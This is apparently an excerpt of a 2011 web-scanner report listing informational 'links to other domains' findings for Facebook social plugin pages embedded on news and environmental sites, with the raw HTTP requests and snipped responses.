http://b.static.ak.fbcdn.net/rsrc.php/v1/yf/r/Pa_Xph4w3wq.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yu/r/MatpvpYmg_x.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/F56NTl3Vdyk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/rvK2wZMiBgl.css
http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&permalink=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

18.154. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.155. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/illegal-boat-caught-with-357-dead-sharks-off-galapagos-islands.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.156. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.157. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&permalink=1

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yf/r/Pa_Xph4w3wq.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yu/r/MatpvpYmg_x.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/F56NTl3Vdyk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/rvK2wZMiBgl.css
http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&permalink=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

18.158. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.159. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/driest-place-on-earth-covered-in-snow-photo.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.160. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&permalink=1

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yf/r/Pa_Xph4w3wq.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yu/r/MatpvpYmg_x.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/F56NTl3Vdyk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/rvK2wZMiBgl.css
http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&permalink=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

18.161. http://www.facebook.com/plugins/fan.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/fan.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/fan.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&connections=10&height=250&id=8304333127&locale=en_US&sdk=joey&stream=false&width=377

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/211688_1833297561_1453193_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273210_100001024334893_4451103_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273452_1243853822_386688_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273619_609983764_1995190_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274632_1222597542_7757898_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275649_100000515589294_4609052_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275768_1160250437_953216_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275867_100001814156454_867311_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/276407_8304333127_804440_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50092_505678634_2161797_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

GET /plugins/fan.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&connections=10&height=250&id=8304333127&locale=en_US&sdk=joey&stream=false&width=377 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.32.60
X-Cnection: close
Date: Sat, 23 Jul 2011 04:32:05 GMT
Content-Length: 10634

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/wsj" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276407_8304333127_804440_q.jpg" alt="The Wall Street Journal" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274632_1222597542_7757898_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ShadowFox283" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273452_1243853822_386688_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1833297561" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211688_1833297561_1453193_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273619_609983764_1995190_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001814156454" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275867_100001814156454_867311_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275649_100000515589294_4609052_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275768_1160250437_953216_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/robbfred" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50092_505678634_2161797_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lourdes.gonzalezcasarez1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273210_100001024334893_4451103_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001957572731" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...

18.162. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?api_key=216232338409059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df180d7b77c%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff37c9d985c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=trebuchet%20ms&href=http%3A%2F%2Fwww.hitcon.org%2Fhit2011%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450

The response contains the following link to another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/h54y3zkIGJ5.css

Request

GET /plugins/like.php?api_key=216232338409059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df180d7b77c%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff37c9d985c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=trebuchet%20ms&href=http%3A%2F%2Fwww.hitcon.org%2Fhit2011%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.hitcon.org/hit2011/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.163. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/173824_1041815832_3415506_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195247_1058832109_3316701_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211621_429086_922537_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/261017_1007030379_7874447_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/273405_100002391254697_4377362_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274204_100002593096634_2575979_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/274872_100001817062958_3149289_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/275850_100000171544387_5458528_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/276279_100002512248508_1769368_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.70.44
X-Cnection: close
Date: Thu, 21 Jul 2011 16:12:42 GMT
Content-Length: 12409

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/newyorkobserver" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41799_9665781619_7931798_q.jpg" alt="The New York Observer" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273405_100002391254697_4377362_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211621_429086_922537_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001709328417" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002593096634" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274204_100002593096634_2575979_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1058832109" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195247_1058832109_3316701_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1041815832" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173824_1041815832_3415506_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/adelbhtnbio" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276279_100002512248508_1769368_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/natalia.johnsen" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/261017_1007030379_7874447_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275850_100000171544387_5458528_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001817062958" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274872_100001817062958_3149289_q.jpg" alt="" /><div class="name">
...[SNIP]...

18.164. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/276877_100484820802_650394_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

18.165. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287

The response contains the following links to other domains:

